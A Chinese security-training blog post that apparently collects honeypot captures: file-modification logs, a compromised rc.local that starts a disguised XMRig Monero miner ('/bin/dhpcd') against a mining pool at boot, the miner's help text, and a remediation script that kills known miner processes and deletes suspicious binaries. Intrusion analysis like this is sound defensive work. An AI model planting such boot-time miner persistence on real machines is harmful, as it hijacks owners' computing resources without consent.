INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.457962 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.625196 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.784003 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.949894 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.113563 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.273291 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.468209 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.611614 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.782594 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.947091 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.086717 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.267656 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.444056 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.619012 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.777156 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.921299 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.114877 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.267230 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.420870 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.588299 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.770619 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.933107 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.073582 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.258056 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.423030 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.599916 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.765426 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.914629 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.080883 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.242431 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.419305 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.584976 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.722322 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.911820 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.603662 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.747130 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.862070 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.888740 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.965000 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.152583 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.340117 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.464616 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.727373 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.882114 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.021524 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.231538 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.577823 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.012116 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.425070 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.815753 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.202723 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.674746 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.956017 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:05.388042 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:05.752932 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.136062 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.535232 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.918982 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:07.376316 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:07.713961 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.104982 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.473439 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.886292 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:09.239495 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:09.646030 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.044261 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.384033 INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.469870 INFO:root:MODIFY event : /etc/rc.local  2019-03-20 15:15:38.510660 INFO:root:MODIFY event : /run/sshd.pid  2019-03-20 15:15:44.673229 INFO:root:MODIFY event : /run/sshd.pid  2019-03-20 15:15:44.673907

# cat /etc/rc.local #!/bin/sh -e # # rc.local # # This script is executed at the end of each multiuser runlevel. # Make sure that the script will "exit 0" on success or any other # value on error. # # In order to enable or disable this script just change the execution # bits. # # By default this script does nothing.  /bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null exit 0

root@92ae08a47348:/opt# ./dhpcd -h Usage: xmrig [OPTIONS] Options:   -a, --algo=ALGO          specify the algorithm to use                              cryptonight   -o, --url=URL            URL of mining server   -O, --userpass=U:P       username:password pair for mining server   -u, --user=USERNAME      username for mining server   -p, --pass=PASSWORD      password for mining server       --rig-id=ID          rig identifier for pool-side statistics (needs pool support)   -t, --threads=N          number of miner threads   -v, --av=N               algorithm variation, 0 auto select   -k, --keepalive          send keepalived packet for prevent timeout (needs pool support)       --nicehash           enable nicehash.com support       --tls                enable SSL/TLS support (needs pool support)       --tls-fingerprint=F  pool TLS certificate fingerprint, if set enable strict certificate pinning   -r, --retries=N          number of times to retry before switch to backup server (default: 5)   -R, --retry-pause=N      time to pause between retries (default: 5)       --cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1       --cpu-priority       set process priority (0 idle, 2 normal to 5 highest)       --no-huge-pages      disable huge pages support       --no-color           disable colored output       --variant            algorithm PoW variant       --donate-level=N     donate level, default 5% (5 minutes in 100 minutes)       --user-agent         set custom user-agent string for pool   -B, --background         run the miner in the background   -c, --config=FILE        load a JSON-format configuration file   -l, --log-file=FILE      log all output to a file   -S, --syslog             use system log for output messages       --max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)       --safe               safe adjust threads and av settings for current CPU       --asm=ASM            ASM code for cn/2, possible values: auto, none, intel, ryzen, bulldozer.       --print-time=N       print hashrate report every N seconds       --api-port=N         port for the miner API       --api-access-token=T access token for API       --api-worker-id=ID   custom worker-id for API       --api-id=ID          custom instance ID for API       --api-ipv6           enable IPv6 support for API       --api-no-restricted  enable full remote access (only if API token set)       --dry-run            test configuration and exit   -h, --help               display this help and exit   -V, --version            output version information and exit

2019-03-22

#!/bin/bash  export LC_ALL=C oldPATH="$PATH" export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin  post_run_file=`mktemp` test "$post_run_file" || post_run_file=/tmp/tmp.post_run_file.$$  sed -i '/\/etc\/cron\.hourly\/\(gcc\|cron\)\.sh/d' /etc/crontab rm -f /etc/cron.hourly/gcc.sh /etc/cron.hourly/gcc4.sh /lib/libudev.so /root/pty /tmp/bash /dev/shm/bash /var/tmp/bash /var/lock/bash /var/run/bash /bin/httpsd /lib/udev/udev /lib/udev/debug /root/sysem /root/systma /etc/jourxlv /tmp/sysem /tmp/su /tmp/ddgs.* rm -rf /tmp/.xm /root/.system /tmp/.iokb21 /var/tmp/... /tmp/.tmp /usr/cpu/bin '/var/tmp/ ' /tmp/.X12-unix /var/tmp/."     " /tmp/.mountfs /tmp/seconfig /root/.ttp chattr -i /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ceurnad chattr -i -a /usr/local/sbin/t /usr/local/sbin/rsync rm -f /usr/local/sbin/t /usr/local/sbin/rsync /etc/ceurnad  pkill -9 -f 'python /bin/httpsd' # order of args matters on some systems pkill -9 xm32 pkill -9 xm64 pkill -9 ceurnad pkill -9 .xmrig pkill -9 -f /tmp/.xs/daemon.i686.mod pkill -9 -f ./systma pkill -9 -f /root/.local/syslogd pkill -9 -f /tmp/samba pkill -9 xorgg pkill -9 sc64u pkill -9 -f /tmp/su  if cd /etc/cron.hourly ; then     for f in *;do         grep -e 'cp "/bin/'${f%.sh}'" "/bin/' -e 'cp "/usr/bin/'${f%.sh}'" "/usr/bin/' "$f"  then     #find ${PATH//:/ } | while read f; do file "$f";done | grep \     find ${oldPATH//:/ } | xargs file | grep \         'statically linked' | cut -d: -f1 | grep -v -e '/mbchk$' \         -e 'dump' -e 'kube' -e ngrok -e iscsistart -e '_ctl$' -e fsck -e '/minidlnad$' \         -e docker -e xenstore -e wine -e nsenter -e importenv -e aide -e shadowsocks \         -e mount -e 'bin/bcm\.user' -e partclone -e drbl-chntpw -e '/crictl$' \         -e '/helm$' -e etcdctl -e '/e3$' -e raid -e agent -e 'print' -e '/isamchk$' \         -e '/mysql' -e '/mdadm$' -e '/jq$' -e '/usr/sbin/redhat_lsb_trigger\.' \         -e '/pfmon' -e '/pfdbg' -e '/packer$' -e '/dns-rebind$' -e '/sz$' -e '/retpan$' \         -e '/gshelld$' -e 'helper$' -e '\.backup$' -e '/ffmpeg$' -e '/rar$' \         -e '/unhide' -e '/rebind$' -e '/v2ctl$' -e '/unace$' -e '/resume$' \         -e '/tw_cli$' -e '/MegaCli$' -e '/lsiutil$' -e '/start$' -e '/fbi$' \         -e 'cobol$' -e '/pack_isam$' -e '/myisa' -e '/isamlog$' -e '/perror$' \         -e 'track' -e 'monitor' -e geckodriver -e '/koolshare' -e '/wipefs$' \         -e wrapper -e replace -e resolveip -e server -e '/ethos-id$' \         -e '/gofmt$' \         -e '/v2ray$' -e '/gitlab-runner$' -e '/hdsfusemnt$' -e '/qtvagent$' \         -e '/xvbeat$' \         -e '/grub$' -e '\.static$' -e '\.old$' | grep -v -F \         -e '/usr/bin/valgrind' \         -e '/usr/sbin/tzdata-update' \         -e '/sbin/busybox' \         -e '/sbin/cryptsetup' \         -e '/sbin/dump' \         -e '/sbin/e2fsck' \         -e '/sbin/fsck.ext2' \         -e '/sbin/fsck.ext3' \         -e '/sbin/ldconfig' \         -e '/sbin/mpath_ctl' \         -e '/sbin/nash' \         -e '/sbin/restore' \         -e '/sbin/rmt' \         -e '/sbin/sln' \         -e '/bin/sln' \         -e '/usr/sbin/build-locale-archive' \         -e '/usr/sbin/glibc_post_upgrade.i686' \         -e '/usr/sbin/glibc_post_upgrade.x86_64' \         -e '/usr/sbin/libgcc_post_upgrade' \         -e '/usr/sbin/prelink' \         -e '/usr/sbin/plesk' \         -e '/usr/bin/wine64-preloader' \         -e '/usr/bin/wine-preloader' \         -e '/bin/busybox' \         -e '/bin/dhpcd' \         -e '/mpath_prio_' \         -e '/usr/sbin/sas2ircu' \         -e '/usr/bin/rar' \         -e '/usr/bin/rlpdump' \         -e '/usr/bin/oracle' \         -e '/sbin/init' \         -e /usr/bin/netserve  \         -e /sbin/auibusy \         -e '/sbin/auplink' \         -e /sbin/aumvdown \         -e '/usr/local/bin/sas2ircu' \         -e '/usr/local/bin/sas3ircu' \         -e '/usr/sbin/glibc_post_upgrade' \         -e '/sbin/discover' \         -e '/usr/bin/jad' | while read ff;do     chattr -i "$ff" #    rm -vi "$ff"/dev/tty     rm -f "$ff"     if echo "$ff" | grep '/ps$' ; then         echo 'yum -y install procps || yum -y reinstall procps || apt-get install --reinstall procps' >>$post_run_file     fi     if echo "$ff" | grep '/ss$' ; then         echo 'yum -y install iproute || yum -y reinstall iproute || apt-get install --reinstall iproute' >>$post_run_file     fi     if echo "$ff" | grep '/lsof$' ; then         echo 'yum -y install lsof || yum -y reinstall lsof || apt-get install --reinstall lsof' >>$post_run_file     fi     if echo "$ff" | grep '/netstat$' ; then         echo 'yum -y install net-tools || yum -y reinstall net-tools || apt-get install --reinstall net-tools' >>$post_run_file     fi done fi  echo More checks: ls -l /proc/*/exe 2>/dev/null | grep -e /tmp -e /dev -e /var -e '\./' -e /usb_bus  if which file ; then     for l in /proc/*/exe;do file "`readlink -f $l`" | grep -e 'statically linked' -e 'too many section header sections' done fi   echo 'top -bn1 | head -n 20:' top -bn1 | head -n 20  echo atq: atq  echo 'crontab -l:' crontab -l  echo /etc/crontab: cat /etc/crontab  echo /etc/cron.hourly: ls -la /etc/cron.hourly  echo /etc/cron.d: ls -la /etc/cron.d  set -x . $post_run_file rm $post_run_file

转载请注明来自网盾网络安全培训，本文标题：《蜜罐捕捉的日志脚本整理》

标签：蜜罐日志分析入侵分析

上一篇：新西兰枪击案后，美国会要求发生极端事件必须“秒删”视频
下一篇：现有互联网模式-可以创造它，也可以推翻它

猜你喜欢

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

蜜罐捕捉的日志脚本整理

2019-3-19号

2019-03-22

猜你喜欢

windows安全日志分析之logparser篇

如何打造一个网络扫描分析平台

如何打造一个网络扫描分析平台 —— Part I

Windows日志分析场景（一）

课程内容

快速链接

战略合作伙伴

蜜罐捕捉的日志脚本整理

2019-3-19号

2019-03-22

猜你喜欢

windows安全日志分析之logparser篇

如何打造一个网络扫描分析平台

如何打造一个网络扫描分析平台 —— Part I

Windows日志分析场景（一）

课程内容

快速链接

战略合作伙伴

谢谢打赏

在线分享